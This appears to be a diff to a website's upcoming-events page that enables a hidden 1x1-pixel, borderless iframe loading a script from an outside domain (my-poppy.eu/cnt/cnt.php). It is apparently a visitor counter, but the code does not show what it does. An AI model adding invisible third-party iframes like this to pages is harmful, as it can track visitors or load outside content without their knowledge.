--- a/_pages/events_upcoming.html
+++ b/_pages/events_upcoming.html
@@ -52,4 +52,4 @@ Past events
 </div>
 </div>
 
-<!--iframe src="https://www.my-poppy.eu/cnt/cnt.php" width="1" height="1" frameBorder="0"-->
+<iframe src="https://www.my-poppy.eu/cnt/cnt.php" width="1" height="1" frameBorder="0">
